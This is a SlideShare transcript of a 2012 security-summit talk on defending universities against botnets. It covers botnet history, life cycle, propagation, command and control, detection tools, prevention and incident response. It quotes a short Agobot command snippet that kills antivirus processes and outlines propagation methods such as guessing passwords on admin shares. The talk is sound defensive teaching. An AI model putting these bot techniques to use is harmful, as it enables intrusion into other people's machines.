The Bot Stops Here:
Removing the BotNet Threat
Eric Vanderburg
JurInnov, Ltd.
April 25, 2012

© 2012 JurInnov Ltd. All Rig...
Presentation Overview
• The Internet is always attacking you but are you
attacking the Internet?
• Botnet overview
• Defin...
Botnet Overview
• Bot
– Program that performs automated tasks
– Remote controlled
– AKA: zombie or drone

• Botnet – colle...
Facts
• 40% of infected machines have 1 or more bots
• Zeus bot is responsible for losses greater than
$100 million

2011 ...
Why are universities particularly susceptible?
• Lack of control over machines
• Silos for research or classroom projects
...
Threat defined – What is done with botnets?
• DDoS
• Spam
• Distribute copyrighted material
– Torrents

• Data mining
• Ha...
2007
Zeus
• Phishing w/ customizable data
2007
collection Cutwail
methods
• 2008 DDoS
Spam, C&C
• Web based Mariposa (Butt...
Life Cycle
Exploit

Rally

Preserve

Inventory

Await
instructions

Update

Execute

Report

• Exploit
–
–
–
–
–

Maliciou...
Life Cycle
Exploit

Rally

Preserve

Inventory

Await
instructions

Update

Execute

Report

Clean
up

Agobot host control...
Life Cycle
Exploit

Rally

Preserve

Inventory

Await
instructions

Update

Execute

Report

Clean
up

• Inventory
– deter...
Life Cycle
Exploit

Rally

Preserve

Inventory

Await
instructions

Update

• Execute commands
–
–
–
–
–
–
–

DDoS
Spam
Ha...
Propagation
• Scan for windows shares and guess passwords
($PRINT, C$, D$, E$, ADMIN$, IPC$) – find
usernames, guess passw...
Propagation
• Use backdoors from common trojans
• P2P – makes files available with enticing names
hoping to be downloaded....
Propagation
• SPIM
– Message contact list
– Send friend requests to contacts from email lists or
harvested IM contacts fro...
Command and Control
• C&C or C2
• Networked with redundancy
• Dynamic DNS with short TTL for C&C IP
(weakness is the DNS, ...
Command and Control
– Web or FTP server
• instructions in a file users download
• Bots report in and hacker uses connectio...
Botnet commands - Agobot
• Commands are
sent as
PRIVMSG,
NOTICE or
TOPIC IRC
messages

16
© 2012 JurInnov Ltd. All Rights ...
Detecting bots
• Monitor port statistics on network equipment and
alert when machines utilize more than average
– Gather w...
Detecting bots - Stager
• Stager (Latest version
4.1)
– Monitors network
statistics using netflow
based on nfdump .

https...
Detecting bots - Firewall
• ASDM –
Cisco ASA
and PIX

19
© 2012 JurInnov Ltd. All Rights Reserved.
Detecting bots - Darknet
• Network telescope (darknet) – collector on an
unused network address space that monitors
whatev...
Detecting C&C
• Ourmon (linux/FreeBSD tool) – detects network
anomalies and correlate it with IRC channel traffic.
• Stats...
Prevention – Vulnerability scanning
• Vulnerability scanning – scan and fix vulnerabilities
found. Identify and protect ma...
Prevention – A/V and Anti-malware
•
•
•
•
•
•
•

AVG (Grisoft) – free for home use
Ad-aware (Lavasoft) - free
Repelit (itS...
Prevention
• Personal firewall
• Firewall
– SmoothWall
– M0n0wall

• IPS/IDS
– Snort – Network IDS
• BASE – web front-end ...
Prevention
• Read only virtual desktops
• Software
– Software restrictions and auditing
– Sandbox software before deployme...
Response
• Incident response
– Determine scope
– Determine if it constitutes a breach and therefore
notification
– Analyze...
Thanks
Enjoy the summit
Acknowledgements:
• Bot command tables obtained from “An Inside Look at Botnets” by

Vinod Yegnesw...
Upcoming SlideShare
Loading in …5
×

The Bot Stops Here: Removing the BotNet Threat - Public and Higher Ed Security Summit - Eric Vanderburg

3,100 views

Published on

Eric Vanderburg, Director of Information Systems and Security at JurInnov, presents "The Bot Stops Here: Removing the BotNet Threat" at the Public and Higher Ed Security Summit.

Published in: Technology
  • Be the first to comment

  • Be the first to like this

The Bot Stops Here: Removing the BotNet Threat - Public and Higher Ed Security Summit - Eric Vanderburg

  1. 1. The Bot Stops Here: Removing the BotNet Threat Eric Vanderburg JurInnov, Ltd. April 25, 2012 © 2012 JurInnov Ltd. All Rights Reserved.
  2. 2. Presentation Overview • The Internet is always attacking you but are you attacking the Internet? • Botnet overview • Defining the threat • Command and Control servers • Propagation • Detection • Prevention • Response 1 © 2012 JurInnov Ltd. All Rights Reserved.
  3. 3. Botnet Overview • Bot – Program that performs automated tasks – Remote controlled – AKA: zombie or drone • Botnet – collection of bots remotely controlled and working together to perform tasks • Bot herder – bot master 2 © 2012 JurInnov Ltd. All Rights Reserved.
  4. 4. Facts • 40% of infected machines have 1 or more bots • Zeus bot is responsible for losses greater than $100 million 2011 Damballa threat report SC Magazine, April 2012 3 © 2012 JurInnov Ltd. All Rights Reserved.
  5. 5. Why are universities particularly susceptible? • Lack of control over machines • Silos for research or classroom projects • A culture of information sharing with minimal boundaries and controls • Heavy recreational use of network resources including P2P, chat, IRC, games, and social networking. • Ideal target for attackers – many hosts – large Internet pipe – Mail and other tempting services 4 © 2012 JurInnov Ltd. All Rights Reserved.
  6. 6. Threat defined – What is done with botnets? • DDoS • Spam • Distribute copyrighted material – Torrents • Data mining • Hacking • Spread itself 5 © 2012 JurInnov Ltd. All Rights Reserved.
  7. 7. 2007 Zeus • Phishing w/ customizable data 2007 collection Cutwail methods • 2008 DDoS Spam, C&C • Web based Mariposa (Butterfly) 2003 RBot 1999 Pretty Park • • Harvests email addresses Rented TDSS • Stealthy and difficultspace for 2008 botnet to detect • Encrypts • Used IRC for C&C & updates itself • Rootkit 2004 PolyBot • Sold andSetsDDoS, and theft is rented “licensed” to hackers •spam, up a proxy that of 1999& email harvesting SubSevenAdmin shell access • • ICQ • data theft Email Delivery: information for personal for anonymous web to other Used IRC GTBot • Builds on AgoBot for C&C 2005 MyTob 2000 • •DoS • Polymorphs through encrypted Delivery: • • Bounce (relay)• IRC traffic Keylogger, • Delivery:access MSN, P2P, USB Keylogger • DDoS, web form Phishing, Social Networking • • • Portshell access encapsulation webcam capture Delivery: Trojan embedded Admin scan collection, • Delivery: email spam using in software • DDoS MyDoom w/ own SMTP server • Delivery: email History 1999 2000 2002 2003 2004 2005 2006 2007 2008 2009 2002 SDBot 2009 Koobface 2006 Rustock • Keylogger 2002 AgoBot • • 2007 DDoS Installs pay-per-install Spam, Storm • Delivery: WebDav and • Modular design • •Uses rootkit tomalware hide MSSQL vulnerabilities, Spam • Delivery: Social Networking 2003 SpyBot • DDoS • Encrypts spam in TLS DameWare remote mgmt Dynamic • • Builds on SDBot Hides with rootkit tech • •Robust C&C fast flux C&C DNS network (over software, password guessing detection • Malware re-encoded twice/hr • • Customizable to avoid Turns off antivirus on common MS ports & web form Defends itself with DDoS •2500 domains) • • DDoS,host file Modifies Keylogger, • •Delivery: email common backdoors collection, (Kazaa, Grokster, • Delivery: P2P clipboard logging, Sold and “licensed” • Delivery: Email enticement for webcam capture BearShare, Limewire) free music • Delivery: SDBot + P2P 6 © 2012 JurInnov Ltd. All Rights Reserved.
  8. 8. Life Cycle Exploit Rally Preserve Inventory Await instructions Update Execute Report • Exploit – – – – – Malicious code Unpatched vulnerabilities Trojan Password guessing Phish • Rally - Reporting in – Log into designated IRC channel and PM master – Make connection to http server – Post data to FTP or http form 7 © 2012 JurInnov Ltd. All Rights Reserved. Clean up
  9. 9. Life Cycle Exploit Rally Preserve Inventory Await instructions Update Execute Report Clean up Agobot host control commands • Preserve – Alter A/V dll’s – Modify Hosts file to prevent A/V updates – Remove default shares (IPC$, ADMIN$, C$) – Rootkit – Encrypt – Polymorph – Retrieve Anti-A/V module – Turn off A/V or firewall services – Kill A/V, firewall or debugging processes 8 © 2012 JurInnov Ltd. All Rights Reserved. <preserve> <pctrl.kill “Mcdetect.exe”/> < pctrl.kill “avgupsvc.exe”/> < pctrl.kill “avgamsvr.exe”/> < pctrl.kill “ccapp.exe”/> </preserve>
  10. 10. Life Cycle Exploit Rally Preserve Inventory Await instructions Update Execute Report Clean up • Inventory – determine capabilities such as RAM, HDD, Processor, Bandwidth, and pre-installed tools • Await instructions from C&C server • Update – Download payload/exploit – Update C&C lists 9 © 2012 JurInnov Ltd. All Rights Reserved.
  11. 11. Life Cycle Exploit Rally Preserve Inventory Await instructions Update • Execute commands – – – – – – – DDoS Spam Harvest emails Keylog Screen capture Webcam stream Steal data • Report back to C&C server • Clean up - Erase evidence 10 © 2012 JurInnov Ltd. All Rights Reserved. Execute Report Clean up
  12. 12. Propagation • Scan for windows shares and guess passwords ($PRINT, C$, D$, E$, ADMIN$, IPC$) – find usernames, guess passwords from list – Remember to use strong passwords Agobot propagation functions 11 © 2012 JurInnov Ltd. All Rights Reserved.
  13. 13. Propagation • Use backdoors from common trojans • P2P – makes files available with enticing names hoping to be downloaded. File names consist of celebrity or model names, games, and popular applications • Social networking – Facebook posts or messages that provides a link (Koobface worm) 12 © 2012 JurInnov Ltd. All Rights Reserved.
  14. 14. Propagation • SPIM – Message contact list – Send friend requests to contacts from email lists or harvested IM contacts from the Internet • Email – Harvests email addresses from ASCII files such as html, php, asp, txt and csv – uses own SMTP engine and guesses the mail server by putting mx, mail, smpt, mx1, mail1, relay or ns in front of the domain name. 13 © 2012 JurInnov Ltd. All Rights Reserved.
  15. 15. Command and Control • C&C or C2 • Networked with redundancy • Dynamic DNS with short TTL for C&C IP (weakness is the DNS, not the C&C server) • Daily rotating encrypted C&C hostnames • Alternate control channels (Ex: Researchers in 2004 redirected C&C to monitoring server) 14 © 2012 JurInnov Ltd. All Rights Reserved.
  16. 16. Command and Control – Web or FTP server • instructions in a file users download • Bots report in and hacker uses connection log to know which ones are live • Bots tracked in URL data • Commands sent via push or pull method – Peer-to-peer – programming can be sent from any peer and discovery is possible from any peer so the network can be disrupted without the C&C server. – Social networking – Instant Messaging 15 © 2012 JurInnov Ltd. All Rights Reserved.
  17. 17. Botnet commands - Agobot • Commands are sent as PRIVMSG, NOTICE or TOPIC IRC messages 16 © 2012 JurInnov Ltd. All Rights Reserved.
  18. 18. Detecting bots • Monitor port statistics on network equipment and alert when machines utilize more than average – Gather with SNMP, netflow, or first stage probes (sniffers) attached to port mirrored ports on switches. • Wireshark • Real time netflow analyzer- Solarwinds free netflow tool • Small Operation Center or MRTG – free SNMP/syslog server with dashboard • SNARE – event log monitoring (Linux & Windows agents) 17 © 2012 JurInnov Ltd. All Rights Reserved.
  19. 19. Detecting bots - Stager • Stager (Latest version 4.1) – Monitors network statistics using netflow based on nfdump . https://trac.uninett.no/stager 18 © 2012 JurInnov Ltd. All Rights Reserved.
  20. 20. Detecting bots - Firewall • ASDM – Cisco ASA and PIX 19 © 2012 JurInnov Ltd. All Rights Reserved.
  21. 21. Detecting bots - Darknet • Network telescope (darknet) – collector on an unused network address space that monitors whatever it receives but does not communicate back. • Most traffic it receives is illegitimate and it can find random scanning worms and internet backscatter (unsolicited commercial or network control messages). • How to set up a darknet http://www.team-cymru.org/Services/darknets.html 20 © 2012 JurInnov Ltd. All Rights Reserved.
  22. 22. Detecting C&C • Ourmon (linux/FreeBSD tool) – detects network anomalies and correlate it with IRC channel traffic. • Stats generated every 30sec • Application layer analytics • Claims from ourmon.sourceforge.net/ – – – – – – – – Monitor TCP (syndump), and UDP (udpreport) flows Log all DNS query responses network wide Measure basic network traffic statistically Catch "unexpected" mail relays Catch botnets Spot infections with random "zero-day" malware Spot attacks from the inside or outside See what protocols are taking up the most bandwidth 21 © 2012 JurInnov Ltd. All Rights Reserved.
  23. 23. Prevention – Vulnerability scanning • Vulnerability scanning – scan and fix vulnerabilities found. Identify and protect machines that could be potential bots. – Nexpose • Free for up to 32 IP – OpenVAS (Vulnerability Assessment System) • Linux • VM available (resource intensive) – Greenbone Desktop Suite (uses OpenVAS) • Windows XP/Vista/7 – MBSA (Microsoft Baseline Security Analyzer) – Secunia PSI (local Windows machine scanning only) 22 © 2012 JurInnov Ltd. All Rights Reserved.
  24. 24. Prevention – A/V and Anti-malware • • • • • • • AVG (Grisoft) – free for home use Ad-aware (Lavasoft) - free Repelit (itSoftware) McAfee Microsoft Security Essentials (free up to 10 PCs) Symantec Spybot Search and Destroy - free 23 © 2012 JurInnov Ltd. All Rights Reserved.
  25. 25. Prevention • Personal firewall • Firewall – SmoothWall – M0n0wall • IPS/IDS – Snort – Network IDS • BASE – web front-end for Snort – OSSEC – Host IDS • Web filtering • SPAM filtering (incoming & outgoing) • Disable VPN split tunnel 24 © 2012 JurInnov Ltd. All Rights Reserved.
  26. 26. Prevention • Read only virtual desktops • Software – Software restrictions and auditing – Sandbox software before deployment • Patch management • NAC (Network Access Control) – A/V & patches 25 © 2012 JurInnov Ltd. All Rights Reserved.
  27. 27. Response • Incident response – Determine scope – Determine if it constitutes a breach and therefore notification – Analyze - Is any evidence needed? • Toolkit – Process Monitor – Rootkit Revealer – Hiren BootCD 15.1 has a variety of tools (http://www.hiren.info/pages/bootcd) – Clean the device 26 © 2012 JurInnov Ltd. All Rights Reserved.
  28. 28. Thanks Enjoy the summit Acknowledgements: • Bot command tables obtained from “An Inside Look at Botnets” by Vinod Yegneswaran • The programs depicted in this presentation are owned by their respective authors 27 © 2012 JurInnov Ltd. All Rights Reserved.

×